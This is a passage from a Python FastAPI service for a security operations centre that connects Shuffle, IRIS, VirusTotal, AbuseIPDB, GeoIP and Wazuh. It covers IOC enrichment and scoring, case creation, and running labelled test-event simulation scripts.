  630. result = await shuffle_adapter.get_workflow(workflow_id)
  631. except Exception as exc:
  632. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  633. return ApiResponse(data={"shuffle": result})
  634. @app.post(
  635. "/shuffle/workflows/{workflow_id}/execute",
  636. response_model=ApiResponse,
  637. summary="Execute Shuffle workflow",
  638. description="Execute a specific Shuffle workflow with custom JSON payload.",
  639. )
  640. async def shuffle_workflow_execute(
  641. workflow_id: str, payload: dict[str, object]
  642. ) -> ApiResponse:
  643. try:
  644. result = await shuffle_adapter.trigger_workflow(workflow_id=workflow_id, payload=payload)
  645. except Exception as exc:
  646. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  647. return ApiResponse(data={"shuffle": result})
  648. @app.get(
  649. "/shuffle/apps",
  650. response_model=ApiResponse,
  651. summary="List Shuffle apps",
  652. description="List installed/available Shuffle apps from app API.",
  653. )
  654. async def shuffle_apps() -> ApiResponse:
  655. try:
  656. result = await shuffle_adapter.list_apps()
  657. except Exception as exc:
  658. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  659. return ApiResponse(data={"shuffle": result})
  660. @app.post(
  661. "/shuffle/proxy",
  662. response_model=ApiResponse,
  663. summary="Proxy request to Shuffle API",
  664. description="Forward arbitrary HTTP request to Shuffle API path via configured credentials.",
  665. )
  666. async def shuffle_proxy(payload: ShuffleProxyRequest) -> ApiResponse:
  667. path = payload.path if payload.path.startswith("/api/") else f"/api/v1/{payload.path.lstrip('/')}"
  668. try:
  669. result = await shuffle_adapter.proxy(
  670. method=payload.method,
  671. path=path,
  672. params=payload.params,
  673. payload=payload.payload,
  674. )
  675. except Exception as exc:
  676. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  677. return ApiResponse(data={"shuffle": result})
  678. @app.post(
  679. "/action/create-iris-case",
  680. response_model=ApiResponse,
  681. summary="Create IRIS case (action)",
  682. description="Create an IRIS case using action payload fields and defaults.",
  683. )
  684. async def create_iris_case(payload: ActionCreateIncidentRequest) -> ApiResponse:
  685. # IRIS v2 expects case_name, case_description, case_customer, case_soc_id.
  686. case_payload = {
  687. "case_name": payload.title,
  688. "case_description": payload.payload.get("description", "Created by soc-integrator"),
  689. "case_customer": payload.payload.get("case_customer", settings.iris_default_customer_id),
  690. "case_soc_id": payload.payload.get("case_soc_id", settings.iris_default_soc_id),
  691. }
  692. try:
  693. iris_result = await iris_adapter.create_case(case_payload)
  694. except Exception as exc:
  695. raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
  696. return ApiResponse(data={"iris": iris_result})
  697. @app.post(
  698. "/iris/tickets",
  699. response_model=ApiResponse,
  700. summary="Create IRIS ticket",
  701. description="Create an IRIS case/ticket directly using ticket request model.",
  702. )
  703. async def iris_create_ticket(payload: IrisTicketCreateRequest) -> ApiResponse:
  704. case_payload = {
  705. "case_name": payload.title,
  706. "case_description": payload.description,
  707. "case_customer": payload.case_customer or settings.iris_default_customer_id,
  708. "case_soc_id": payload.case_soc_id or settings.iris_default_soc_id,
  709. }
  710. if payload.payload:
  711. case_payload.update(payload.payload)
  712. try:
  713. iris_result = await iris_adapter.create_case(case_payload)
  714. except Exception as exc:
  715. raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
  716. return ApiResponse(data={"iris": iris_result})
  717. @app.get(
  718. "/iris/tickets",
  719. response_model=ApiResponse,
  720. summary="List IRIS tickets",
  721. description="List IRIS cases with pagination, using v2 or legacy fallback endpoint.",
  722. )
  723. async def iris_list_tickets(limit: int = 50, offset: int = 0) -> ApiResponse:
  724. try:
  725. iris_result = await iris_adapter.list_cases(limit=limit, offset=offset)
  726. except Exception as exc:
  727. raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
  728. return ApiResponse(data={"iris": iris_result})
  729. def _build_vt_ioc_result(
  730. vt: dict[str, object],
  731. ioc_type: str,
  732. ioc_value: str,
  733. malicious_threshold: int,
  734. suspicious_threshold: int,
  735. ) -> tuple[dict[str, object], bool, str, float]:
  736. stats = (
  737. (((vt.get("data") or {}).get("attributes") or {}).get("last_analysis_stats"))
  738. if isinstance(vt, dict)
  739. else None
  740. ) or {}
  741. malicious = int(stats.get("malicious", 0) or 0)
  742. suspicious = int(stats.get("suspicious", 0) or 0)
  743. harmless = int(stats.get("harmless", 0) or 0)
  744. undetected = int(stats.get("undetected", 0) or 0)
  745. total = malicious + suspicious + harmless + undetected
  746. confidence = 0.0 if total == 0 else round(((malicious + (0.5 * suspicious)) / total), 4)
  747. matched = (malicious >= malicious_threshold) or (suspicious >= suspicious_threshold)
  748. severity = "low"
  749. if malicious >= 5 or suspicious >= 10:
  750. severity = "critical"
  751. elif malicious >= 2 or suspicious >= 5:
  752. severity = "high"
  753. elif malicious >= 1 or suspicious >= 1:
  754. severity = "medium"
  755. reason = (
  756. f"virustotal_stats malicious={malicious} suspicious={suspicious} "
  757. f"thresholds(malicious>={malicious_threshold}, suspicious>={suspicious_threshold})"
  758. )
  759. result: dict[str, object] = {
  760. "ioc_type": ioc_type,
  761. "ioc_value": ioc_value,
  762. "matched": matched,
  763. "severity": severity,
  764. "confidence": confidence,
  765. "reason": reason,
  766. "providers": {
  767. "virustotal": {
  768. "stats": stats,
  769. }
  770. },
  771. "raw": {
  772. "virustotal": vt,
  773. },
  774. }
  775. return result, matched, severity, confidence
  776. def _build_abuseipdb_ioc_result(
  777. abuse: dict[str, object],
  778. ioc_value: str,
  779. confidence_threshold: int = 50,
  780. ) -> tuple[dict[str, object], bool, str, float]:
  781. data = ((abuse.get("data") if isinstance(abuse, dict) else None) or {}) if isinstance(abuse, dict) else {}
  782. score = int(data.get("abuseConfidenceScore", 0) or 0)
  783. total_reports = int(data.get("totalReports", 0) or 0)
  784. matched = score >= confidence_threshold
  785. severity = "low"
  786. if score >= 90:
  787. severity = "critical"
  788. elif score >= 70:
  789. severity = "high"
  790. elif score >= 30:
  791. severity = "medium"
  792. confidence = round(score / 100.0, 4)
  793. reason = f"abuseipdb score={score} totalReports={total_reports} threshold>={confidence_threshold}"
  794. result: dict[str, object] = {
  795. "ioc_type": "ip",
  796. "ioc_value": ioc_value,
  797. "matched": matched,
  798. "severity": severity,
  799. "confidence": confidence,
  800. "reason": reason,
  801. "providers": {"abuseipdb": {"score": score, "totalReports": total_reports, "raw": abuse}},
  802. }
  803. return result, matched, severity, confidence
  804. def _extract_first_array(payload: object) -> list[object]:
  805. if isinstance(payload, list):
  806. return payload
  807. if not isinstance(payload, dict):
  808. return []
  809. preferred_keys = [
  810. "items",
  811. "results",
  812. "workflows",
  813. "apps",
  814. "affected_items",
  815. "data",
  816. ]
  817. for key in preferred_keys:
  818. value = payload.get(key)
  819. if isinstance(value, list):
  820. return value
  821. for value in payload.values():
  822. extracted = _extract_first_array(value)
  823. if extracted:
  824. return extracted
  825. return []
# Maps a simulation script identifier (as accepted by the sim-log API) to the
# shell script filename that emits the corresponding Wazuh test events.
# The filename is resolved against SIM_SCRIPTS_DIR in _build_sim_command.
SIM_SCRIPT_MAP: dict[str, str] = {
    "fortigate": "send-wazuh-fortigate-test-events.sh",
    "endpoint": "send-wazuh-endpoint-agent-test-events.sh",
    "cisco": "send-wazuh-cisco-test-events.sh",
    "proposal_required": "send-wazuh-proposal-required-events.sh",
    "proposal_appendix_b": "send-wazuh-proposal-appendix-b-events.sh",
    "proposal_appendix_c": "send-wazuh-proposal-appendix-c-events.sh",
    "wazuh_test": "send-wazuh-test-events.sh",
}
  835. def _build_sim_command(payload: SimLogRunRequest) -> list[str]:
  836. script_name = SIM_SCRIPT_MAP[payload.script]
  837. script_path = SIM_SCRIPTS_DIR / script_name
  838. count = max(1, int(payload.count))
  839. delay = max(0.0, float(payload.delay_seconds))
  840. if payload.script == "endpoint":
  841. cmd = [
  842. "/bin/bash",
  843. str(script_path),
  844. payload.target or "all",
  845. payload.scenario or "all",
  846. str(count),
  847. str(delay),
  848. ]
  849. else:
  850. cmd = [
  851. "/bin/bash",
  852. str(script_path),
  853. payload.target or "all",
  854. str(count),
  855. str(delay),
  856. ]
  857. if payload.forever:
  858. cmd.append("--forever")
  859. return cmd
  860. def _serialize_sim_run(run_id: str, run: dict[str, object]) -> dict[str, object]:
  861. process = run.get("process")
  862. poll_code = process.poll() if process else None
  863. return_code = run.get("return_code")
  864. if poll_code is not None and return_code is None:
  865. run["return_code"] = poll_code
  866. return_code = poll_code
  867. return {
  868. "run_id": run_id,
  869. "script": run.get("script"),
  870. "target": run.get("target"),
  871. "scenario": run.get("scenario"),
  872. "count": run.get("count"),
  873. "delay_seconds": run.get("delay_seconds"),
  874. "forever": run.get("forever"),
  875. "pid": run.get("pid"),
  876. "cmd": run.get("cmd"),
  877. "started_at": run.get("started_at"),
  878. "stopped_at": run.get("stopped_at"),
  879. "running": bool(process and process.poll() is None),
  880. "return_code": return_code,
  881. "log_file": run.get("log_file"),
  882. }
  883. def _tail_log_lines(path: Path, limit: int = 200) -> list[str]:
  884. line_limit = max(1, min(int(limit), 1000))
  885. lines: deque[str] = deque(maxlen=line_limit)
  886. try:
  887. with path.open("r", encoding="utf-8", errors="replace") as handle:
  888. for line in handle:
  889. lines.append(line.rstrip("\n"))
  890. except FileNotFoundError:
  891. return []
  892. return list(lines)
  893. def _safe_query_token(value: object) -> str | None:
  894. text = str(value or "").strip()
  895. if not text:
  896. return None
  897. if not re.fullmatch(r"[A-Za-z0-9_.:-]+", text):
  898. return None
  899. return text
  900. def _parse_iso_datetime(value: object) -> datetime | None:
  901. text = str(value or "").strip()
  902. if not text:
  903. return None
  904. if text.endswith("Z"):
  905. text = text[:-1] + "+00:00"
  906. try:
  907. parsed = datetime.fromisoformat(text)
  908. except ValueError:
  909. return None
  910. if parsed.tzinfo is None:
  911. parsed = parsed.replace(tzinfo=timezone.utc)
  912. return parsed.astimezone(timezone.utc)
def _sim_wazuh_query_clauses(run: dict[str, object]) -> list[str]:
    """Build query-string clauses that select the Wazuh events a sim run emitted.

    Every result starts with the soc_mvp_test marker clause; script-specific
    filter clauses are appended based on the run's script and target fields.
    """
    script = str(run.get("script") or "").strip().lower()
    target = str(run.get("target") or "all").strip()
    scenario = str(run.get("scenario") or "all").strip().lower()
    # Only use the target in a query when it passes the safe-character check.
    target_token = _safe_query_token(target)
    _ = scenario  # scenario is parsed but not currently used for filtering
    clauses: list[str] = ["(full_log:*soc_mvp_test=true* OR data.soc_mvp_test:true)"]
    if script == "fortigate":
        # Match FortiGate events by vendor/product fields or model substrings.
        clauses.append(
            "(full_log:*fortigate* OR full_log:*FGT80F* OR full_log:*FGT60F* OR full_log:*FGT40F* "
            "OR full_log:*FGT501E* OR data.vendor:fortinet OR data.product:fortigate OR data.source:fortigate)"
        )
        if target_token and target_token.lower() != "all":
            clauses.append(f"(full_log:*{target_token}* OR data.model:{target_token})")
    elif script == "endpoint":
        if target_token and target_token.lower() != "all":
            lowered = target_token.lower()
            if lowered in {"windows", "win"}:
                clauses.append(
                    "(full_log:*source=windows* OR full_log:*source=windows_agent* "
                    "OR data.source:windows OR data.source:windows_agent OR data.platform:windows)"
                )
            elif lowered in {"mac", "macos"}:
                clauses.append(
                    "(full_log:*source=mac* OR full_log:*source=mac_agent* "
                    "OR data.source:mac OR data.source:mac_agent OR data.platform:mac)"
                )
            elif lowered == "linux":
                clauses.append(
                    "(full_log:*source=linux* OR full_log:*source=linux_agent* "
                    "OR data.source:linux OR data.source:linux_agent OR data.platform:linux)"
                )
            else:
                # Unrecognized endpoint target: fall back to a raw substring match.
                clauses.append(f"full_log:*{target_token}*")
        else:
            # No specific target: match any of the three endpoint platforms.
            clauses.append(
                "(full_log:*source=windows* OR full_log:*source=windows_agent* "
                "OR full_log:*source=mac* OR full_log:*source=mac_agent* "
                "OR full_log:*source=linux* OR full_log:*source=linux_agent* "
                "OR data.source:windows OR data.source:windows_agent "
                "OR data.source:mac OR data.source:mac_agent "
                "OR data.source:linux OR data.source:linux_agent)"
            )
    elif script == "cisco":
        clauses.append("(full_log:*cisco* OR data.vendor:cisco)")
        if target_token and target_token.lower() != "all":
            clauses.append(f"full_log:*{target_token}*")
    elif script in {"proposal_required", "proposal_appendix_b", "proposal_appendix_c", "wazuh_test"}:
        # Proposal/test scripts only carry the generic test marker.
        clauses.append("(full_log:*soc_mvp_test=true* OR data.soc_mvp_test:true)")
        if target_token and target_token.lower() != "all":
            clauses.append(f"full_log:*{target_token}*")
    else:
        # Unknown script: keep at least the simulation marker.
        clauses.append("full_log:*soc_mvp_test=true*")
    return clauses
  967. def _extract_wazuh_hits(payload: object) -> list[dict[str, object]]:
  968. if not isinstance(payload, dict):
  969. return []
  970. hits_root = payload.get("hits")
  971. if not isinstance(hits_root, dict):
  972. return []
  973. hits = hits_root.get("hits")
  974. if not isinstance(hits, list):
  975. return []
  976. result: list[dict[str, object]] = []
  977. for hit in hits:
  978. if isinstance(hit, dict):
  979. result.append(hit)
  980. return result
  981. def _extract_wazuh_event_item(hit: dict[str, object], include_raw: bool) -> dict[str, object]:
  982. source = hit.get("_source") if isinstance(hit.get("_source"), dict) else {}
  983. source = source if isinstance(source, dict) else {}
  984. agent = source.get("agent") if isinstance(source.get("agent"), dict) else {}
  985. agent = agent if isinstance(agent, dict) else {}
  986. decoder = source.get("decoder") if isinstance(source.get("decoder"), dict) else {}
  987. decoder = decoder if isinstance(decoder, dict) else {}
  988. data = source.get("data") if isinstance(source.get("data"), dict) else {}
  989. data = data if isinstance(data, dict) else {}
  990. rule = source.get("rule") if isinstance(source.get("rule"), dict) else {}
  991. rule = rule if isinstance(rule, dict) else {}
  992. item: dict[str, object] = {
  993. "@timestamp": source.get("@timestamp") or source.get("timestamp"),
  994. "event_id": data.get("event_id") or source.get("id") or hit.get("_id"),
  995. "agent_name": agent.get("name"),
  996. "agent_id": agent.get("id"),
  997. "decoder_name": decoder.get("name"),
  998. "source": data.get("source"),
  999. "event_type": data.get("event_type"),
  1000. "severity": data.get("severity"),
  1001. "rule_id": rule.get("id"),
  1002. "rule_description": rule.get("description"),
  1003. "full_log": source.get("full_log"),
  1004. }
  1005. if include_raw:
  1006. item["raw"] = source
  1007. return item
  1008. def _extract_wazuh_rule_item(hit: dict[str, object], include_raw: bool) -> dict[str, object] | None:
  1009. source = hit.get("_source") if isinstance(hit.get("_source"), dict) else {}
  1010. source = source if isinstance(source, dict) else {}
  1011. rule = source.get("rule") if isinstance(source.get("rule"), dict) else {}
  1012. rule = rule if isinstance(rule, dict) else {}
  1013. rule_id = rule.get("id")
  1014. if rule_id in {None, ""}:
  1015. return None
  1016. agent = source.get("agent") if isinstance(source.get("agent"), dict) else {}
  1017. agent = agent if isinstance(agent, dict) else {}
  1018. data = source.get("data") if isinstance(source.get("data"), dict) else {}
  1019. data = data if isinstance(data, dict) else {}
  1020. item: dict[str, object] = {
  1021. "@timestamp": source.get("@timestamp") or source.get("timestamp"),
  1022. "rule_id": rule_id,
  1023. "rule_level": rule.get("level"),
  1024. "rule_description": rule.get("description"),
  1025. "rule_firedtimes": rule.get("firedtimes"),
  1026. "event_id": data.get("event_id") or source.get("id") or hit.get("_id"),
  1027. "agent_name": agent.get("name"),
  1028. "full_log": source.get("full_log"),
  1029. }
  1030. if include_raw:
  1031. item["raw"] = source
  1032. return item
  1033. @app.post(
  1034. "/ioc/enrich",
  1035. response_model=ApiResponse,
  1036. summary="IOC enrich",
  1037. description="Fetch enrichment data for IOC from selected providers without final verdict scoring.",
  1038. )
  1039. async def ioc_enrich(payload: IocEnrichRequest) -> ApiResponse:
  1040. providers = [p.lower().strip() for p in payload.providers]
  1041. result: dict[str, object] = {
  1042. "ioc_type": payload.ioc_type,
  1043. "ioc_value": payload.ioc_value,
  1044. "providers_requested": providers,
  1045. "providers": {},
  1046. }
  1047. if "virustotal" in providers:
  1048. try:
  1049. vt = await virustotal_adapter.enrich_ioc(payload.ioc_type, payload.ioc_value)
  1050. result["providers"] = {**(result.get("providers") or {}), "virustotal": vt}
  1051. except Exception as exc:
  1052. repo.add_ioc_trace(
  1053. action="enrich",
  1054. ioc_type=payload.ioc_type,
  1055. ioc_value=payload.ioc_value,
  1056. providers=providers,
  1057. request_payload=payload.model_dump(mode="json"),
  1058. response_payload={},
  1059. error=str(exc),
  1060. )
  1061. raise HTTPException(status_code=502, detail=f"VirusTotal call failed: {exc}") from exc
  1062. if "abuseipdb" in providers:
  1063. if payload.ioc_type != "ip":
  1064. result["providers"] = {
  1065. **(result.get("providers") or {}),
  1066. "abuseipdb": {"skipped": "AbuseIPDB currently supports ioc_type='ip' only"},
  1067. }
  1068. else:
  1069. try:
  1070. abuse = await abuseipdb_adapter.check_ip(payload.ioc_value)
  1071. result["providers"] = {**(result.get("providers") or {}), "abuseipdb": abuse}
  1072. except Exception as exc:
  1073. repo.add_ioc_trace(
  1074. action="enrich",
  1075. ioc_type=payload.ioc_type,
  1076. ioc_value=payload.ioc_value,
  1077. providers=providers,
  1078. request_payload=payload.model_dump(mode="json"),
  1079. response_payload={},
  1080. error=str(exc),
  1081. )
  1082. raise HTTPException(status_code=502, detail=f"AbuseIPDB call failed: {exc}") from exc
  1083. repo.add_ioc_trace(
  1084. action="enrich",
  1085. ioc_type=payload.ioc_type,
  1086. ioc_value=payload.ioc_value,
  1087. providers=providers,
  1088. request_payload=payload.model_dump(mode="json"),
  1089. response_payload=result,
  1090. )
  1091. return ApiResponse(data={"ioc": result})
@app.post(
    "/ioc/evaluate",
    response_model=ApiResponse,
    summary="IOC evaluate",
    description="Evaluate IOC against selected intelligence providers and return matched/severity/confidence.",
)
async def ioc_evaluate(payload: IocEvaluateRequest) -> ApiResponse:
    """Evaluate one IOC against the requested providers and aggregate a verdict.

    Each supported provider produces its own matched/severity/confidence
    result. The aggregate is: matched if any provider matched, the maximum
    confidence, and the highest severity bucket. Individual provider failures
    are collected and only become a 502 when no provider succeeded at all.
    """
    providers = [p.lower().strip() for p in payload.providers]
    supported = {"virustotal", "abuseipdb"}
    requested = [p for p in providers if p in supported]
    if not requested:
        raise HTTPException(status_code=400, detail="No supported provider requested. Use ['virustotal'] or ['abuseipdb'].")
    per_provider: dict[str, dict[str, object]] = {}
    errors: dict[str, str] = {}
    if "virustotal" in requested:
        try:
            vt = await virustotal_adapter.enrich_ioc(payload.ioc_type, payload.ioc_value)
            vt_result, _, _, _ = _build_vt_ioc_result(
                vt=vt,
                ioc_type=payload.ioc_type,
                ioc_value=payload.ioc_value,
                malicious_threshold=payload.malicious_threshold,
                suspicious_threshold=payload.suspicious_threshold,
            )
            per_provider["virustotal"] = vt_result
        except Exception as exc:
            # Keep going; the other provider may still succeed.
            errors["virustotal"] = str(exc)
    if "abuseipdb" in requested:
        if payload.ioc_type != "ip":
            errors["abuseipdb"] = "AbuseIPDB supports ioc_type='ip' only"
        else:
            try:
                abuse = await abuseipdb_adapter.check_ip(payload.ioc_value)
                abuse_result, _, _, _ = _build_abuseipdb_ioc_result(
                    abuse=abuse,
                    ioc_value=payload.ioc_value,
                    confidence_threshold=50,
                )
                per_provider["abuseipdb"] = abuse_result
            except Exception as exc:
                errors["abuseipdb"] = str(exc)
    if not per_provider:
        # Every requested provider failed: trace the failure, then report 502.
        repo.add_ioc_trace(
            action="evaluate",
            ioc_type=payload.ioc_type,
            ioc_value=payload.ioc_value,
            providers=requested,
            request_payload=payload.model_dump(mode="json"),
            response_payload={},
            error=str(errors),
        )
        raise HTTPException(status_code=502, detail=f"Provider evaluation failed: {errors}")
    # aggregate decision (max confidence/severity, matched if any provider matched)
    order = {"low": 1, "medium": 2, "high": 3, "critical": 4}
    matched = any(bool(r.get("matched")) for r in per_provider.values())
    confidence = max(float(r.get("confidence", 0.0) or 0.0) for r in per_provider.values())
    severity = max((str(r.get("severity", "low")) for r in per_provider.values()), key=lambda x: order.get(x, 1))
    reason_parts = [f"{name}:{res.get('reason','')}" for name, res in per_provider.items()]
    if errors:
        reason_parts.append(f"errors={errors}")
    ioc_result = {
        "ioc_type": payload.ioc_type,
        "ioc_value": payload.ioc_value,
        "matched": matched,
        "severity": severity,
        "confidence": round(confidence, 4),
        "reason": " | ".join(reason_parts),
        "providers": per_provider,
    }
    repo.add_ioc_trace(
        action="evaluate",
        ioc_type=payload.ioc_type,
        ioc_value=payload.ioc_value,
        providers=providers,
        request_payload=payload.model_dump(mode="json"),
        response_payload=ioc_result,
        matched=matched,
        severity=severity,
        confidence=float(ioc_result["confidence"]),
    )
    return ApiResponse(data={"ioc": ioc_result})
  1173. @app.post(
  1174. "/ioc/upload-file",
  1175. response_model=ApiResponse,
  1176. summary="Upload file to VirusTotal",
  1177. description="Upload a file sample to VirusTotal and return upload/analysis identifiers.",
  1178. )
  1179. async def ioc_upload_file(file: UploadFile = File(...)) -> ApiResponse:
  1180. content = await file.read()
  1181. if not content:
  1182. raise HTTPException(status_code=400, detail="Uploaded file is empty")
  1183. try:
  1184. vt_upload = await virustotal_adapter.upload_file(file.filename or "upload.bin", content)
  1185. except Exception as exc:
  1186. repo.add_ioc_trace(
  1187. action="upload_file",
  1188. ioc_type="hash",
  1189. ioc_value=file.filename or "<unknown>",
  1190. providers=["virustotal"],
  1191. request_payload={"filename": file.filename, "size": len(content)},
  1192. response_payload={},
  1193. error=str(exc),
  1194. )
  1195. raise HTTPException(status_code=502, detail=f"VirusTotal upload failed: {exc}") from exc
  1196. repo.add_ioc_trace(
  1197. action="upload_file",
  1198. ioc_type="hash",
  1199. ioc_value=file.filename or "<unknown>",
  1200. providers=["virustotal"],
  1201. request_payload={"filename": file.filename, "size": len(content)},
  1202. response_payload=vt_upload if isinstance(vt_upload, dict) else {"raw": str(vt_upload)},
  1203. )
  1204. return ApiResponse(data={"virustotal": vt_upload})
  1205. @app.get(
  1206. "/ioc/analysis/{analysis_id}",
  1207. response_model=ApiResponse,
  1208. summary="Get VirusTotal analysis",
  1209. description="Fetch analysis status/details from VirusTotal by analysis ID.",
  1210. )
  1211. async def ioc_get_analysis(analysis_id: str) -> ApiResponse:
  1212. try:
  1213. vt_analysis = await virustotal_adapter.get_analysis(analysis_id)
  1214. except Exception as exc:
  1215. repo.add_ioc_trace(
  1216. action="analysis",
  1217. ioc_type="hash",
  1218. ioc_value=analysis_id,
  1219. providers=["virustotal"],
  1220. request_payload={"analysis_id": analysis_id},
  1221. response_payload={},
  1222. error=str(exc),
  1223. )
  1224. raise HTTPException(status_code=502, detail=f"VirusTotal analysis fetch failed: {exc}") from exc
  1225. repo.add_ioc_trace(
  1226. action="analysis",
  1227. ioc_type="hash",
  1228. ioc_value=analysis_id,
  1229. providers=["virustotal"],
  1230. request_payload={"analysis_id": analysis_id},
  1231. response_payload=vt_analysis if isinstance(vt_analysis, dict) else {"raw": str(vt_analysis)},
  1232. )
  1233. return ApiResponse(data={"virustotal": vt_analysis})
@app.post(
    "/ioc/evaluate-file",
    response_model=ApiResponse,
    summary="Evaluate uploaded file IOC",
    description="Upload a file, poll analysis completion, fetch final file report, and return IOC verdict.",
)
async def ioc_evaluate_file(
    file: UploadFile = File(...),
    malicious_threshold: int = 1,
    suspicious_threshold: int = 3,
    poll_timeout_seconds: int = 30,
    poll_interval_seconds: int = 2,
) -> ApiResponse:
    """Upload a sample to VirusTotal, wait for analysis, and return a verdict.

    Flow: upload the file, poll the analysis until its status is "completed"
    or the timeout budget runs out, fetch the full file report by SHA-256,
    then score it with `_build_vt_ioc_result`. Failure paths record an IOC
    trace before raising a 502.
    """
    content = await file.read()
    if not content:
        raise HTTPException(status_code=400, detail="Uploaded file is empty")
    try:
        vt_upload = await virustotal_adapter.upload_file(file.filename or "upload.bin", content)
    except Exception as exc:
        repo.add_ioc_trace(
            action="evaluate_file",
            ioc_type="hash",
            ioc_value=file.filename or "<unknown>",
            providers=["virustotal"],
            request_payload={"filename": file.filename, "size": len(content)},
            response_payload={},
            error=str(exc),
        )
        raise HTTPException(status_code=502, detail=f"VirusTotal upload failed: {exc}") from exc
    # The upload response carries the analysis identifier at data.id.
    analysis_id = (
        (((vt_upload.get("data") or {}).get("id")) if isinstance(vt_upload, dict) else None)
        or ""
    )
    if not analysis_id:
        raise HTTPException(status_code=502, detail="VirusTotal upload response missing analysis ID")
    timeout = max(1, poll_timeout_seconds)
    interval = max(1, poll_interval_seconds)
    elapsed = 0
    analysis: dict[str, object] = {}
    # Poll until the analysis reports "completed" or the timeout budget is spent.
    while elapsed <= timeout:
        analysis = await virustotal_adapter.get_analysis(analysis_id)
        status = (
            (((analysis.get("data") or {}).get("attributes") or {}).get("status"))
            if isinstance(analysis, dict)
            else None
        )
        if status == "completed":
            break
        await asyncio.sleep(interval)
        elapsed += interval
    # meta.file_info.sha256 identifies the file for the final report lookup.
    sha256 = (
        (((analysis.get("meta") or {}).get("file_info") or {}).get("sha256"))
        if isinstance(analysis, dict)
        else None
    )
    if not sha256:
        raise HTTPException(status_code=502, detail="VirusTotal analysis did not return file hash yet")
    try:
        vt_file = await virustotal_adapter.enrich_ioc("hash", str(sha256))
    except Exception as exc:
        repo.add_ioc_trace(
            action="evaluate_file",
            ioc_type="hash",
            ioc_value=str(sha256),
            providers=["virustotal"],
            request_payload={"filename": file.filename, "analysis_id": analysis_id},
            response_payload={"upload": vt_upload, "analysis": analysis},
            error=str(exc),
        )
        raise HTTPException(status_code=502, detail=f"VirusTotal report fetch failed: {exc}") from exc
    # Score the final file report into the common IOC verdict shape.
    ioc_result, matched, severity, confidence = _build_vt_ioc_result(
        vt=vt_file,
        ioc_type="hash",
        ioc_value=str(sha256),
        malicious_threshold=malicious_threshold,
        suspicious_threshold=suspicious_threshold,
    )
    ioc_result["analysis_id"] = analysis_id
    ioc_result["filename"] = file.filename
    repo.add_ioc_trace(
        action="evaluate_file",
        ioc_type="hash",
        ioc_value=str(sha256),
        providers=["virustotal"],
        request_payload={"filename": file.filename, "analysis_id": analysis_id},
        response_payload={
            "upload": vt_upload,
            "analysis": analysis,
            "ioc": ioc_result,
        },
        matched=matched,
        severity=severity,
        confidence=confidence,
    )
    return ApiResponse(data={"ioc": ioc_result, "analysis": analysis, "upload": vt_upload})
  1329. @app.get(
  1330. "/ioc/history",
  1331. response_model=ApiResponse,
  1332. summary="IOC trace history",
  1333. description="List recent IOC enrichment/evaluation trace records stored in database.",
  1334. )
  1335. async def ioc_history(limit: int = 50, offset: int = 0) -> ApiResponse:
  1336. return ApiResponse(data={"items": repo.list_ioc_trace(limit=limit, offset=offset)})
  1337. @app.get(
  1338. "/geoip/{ip}",
  1339. response_model=ApiResponse,
  1340. summary="GeoIP lookup",
  1341. description="Lookup geolocation for a public IP address using configured GeoIP provider.",
  1342. )
  1343. async def geoip_lookup(ip: str) -> ApiResponse:
  1344. result = await geoip_adapter.lookup(ip)
  1345. return ApiResponse(data={"geoip": result})
  1346. @app.get(
  1347. "/sync/wazuh-version",
  1348. response_model=ApiResponse,
  1349. summary="Wazuh version",
  1350. description="Get Wazuh API/manager version information through adapter.",
  1351. )
  1352. async def sync_wazuh_version() -> ApiResponse:
  1353. try:
  1354. wazuh_result = await wazuh_adapter.get_version()
  1355. except Exception as exc:
  1356. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1357. return ApiResponse(data={"wazuh": wazuh_result})
  1358. @app.get(
  1359. "/wazuh/auth-test",
  1360. response_model=ApiResponse,
  1361. summary="Wazuh auth test",
  1362. description="Validate Wazuh API authentication using configured credentials.",
  1363. )
  1364. async def wazuh_auth_test() -> ApiResponse:
  1365. try:
  1366. result = await wazuh_adapter.auth_test()
  1367. except Exception as exc:
  1368. raise HTTPException(status_code=502, detail=f"Wazuh auth failed: {exc}") from exc
  1369. return ApiResponse(data={"wazuh": result})
  1370. @app.get(
  1371. "/wazuh/manager-info",
  1372. response_model=ApiResponse,
  1373. summary="Wazuh manager info",
  1374. description="Return manager information from Wazuh API.",
  1375. )
  1376. async def wazuh_manager_info() -> ApiResponse:
  1377. try:
  1378. result = await wazuh_adapter.get_manager_info()
  1379. except Exception as exc:
  1380. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1381. return ApiResponse(data={"wazuh": result})
  1382. @app.get(
  1383. "/wazuh/agents",
  1384. response_model=ApiResponse,
  1385. summary="List Wazuh agents",
  1386. description="List registered Wazuh agents with pagination and optional field selection.",
  1387. )
  1388. async def wazuh_agents(
  1389. limit: int = 50,
  1390. offset: int = 0,
  1391. select: str | None = None,
  1392. ) -> ApiResponse:
  1393. try:
  1394. result = await wazuh_adapter.list_agents(limit=limit, offset=offset, select=select)
  1395. except Exception as exc:
  1396. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1397. return ApiResponse(data={"wazuh": result})
  1398. @app.get(
  1399. "/wazuh/alerts",
  1400. response_model=ApiResponse,
  1401. summary="List Wazuh alerts",
  1402. description="List alert-like entries from manager logs API for current Wazuh build.",
  1403. )
  1404. async def wazuh_alerts(
  1405. limit: int = 50,
  1406. offset: int = 0,
  1407. q: str | None = None,
  1408. sort: str | None = None,
  1409. ) -> ApiResponse:
  1410. try:
  1411. # In this Wazuh build, API alerts are exposed via manager logs.
  1412. result = await wazuh_adapter.list_manager_logs(
  1413. limit=limit, offset=offset, q=q, sort=sort
  1414. )
  1415. except Exception as exc:
  1416. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1417. return ApiResponse(data={"wazuh": result})
  1418. @app.get(
  1419. "/wazuh/manager-logs",
  1420. response_model=ApiResponse,
  1421. summary="List Wazuh manager logs",
  1422. description="Query manager logs endpoint with pagination and optional q/sort filters.",
  1423. )
  1424. async def wazuh_manager_logs(
  1425. limit: int = 50,
  1426. offset: int = 0,
  1427. q: str | None = None,
  1428. sort: str | None = None,
